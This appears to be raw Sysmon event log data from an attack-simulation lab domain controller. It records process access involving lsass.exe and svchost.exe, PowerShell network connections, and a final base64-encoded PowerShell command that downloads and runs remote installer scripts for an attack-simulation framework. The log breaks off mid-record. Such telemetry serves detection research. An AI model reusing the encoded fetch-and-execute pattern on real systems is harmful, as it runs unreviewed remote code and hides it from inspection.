10341000x80000000000000003649Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.218{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003648Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.124{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003647Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.124{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003646Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.124{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003645Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.124{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003644Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.124{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003643Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.124{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x80000000000000003787Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.287{D28789B6-7CAD-5FA1-B200-000000008801}652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50320-false152.199.19.161-443https 354300x80000000000000003786Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.270{D28789B6-7CAD-5FA1-B200-000000008801}652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50319-false172.227.168.22a172-227-168-22.deploy.static.akamaitechnologies.com443https 10341000x80000000000000003785Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.392{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003784Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.392{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003783Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.361{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3frngmax.kux.ps12020-11-03 15:52:17.361 10341000x80000000000000003782Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.345{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003781Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.329{D28789B6-7CB0-5FA1-B600-000000008801}12524136C:\Windows\system32\conhost.exe{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003780Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.329{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003779Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.329{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003778Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.329{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003777Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.329{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003776Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.329{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003775Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.329{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003774Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.329{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003773Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.314{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003772Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.314{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003771Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.314{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003770Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.314{D28789B6-7CB0-5FA1-B900-000000008801}43483284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(00007FF8DC788890) 154100x80000000000000003769Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.328{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CB0-5F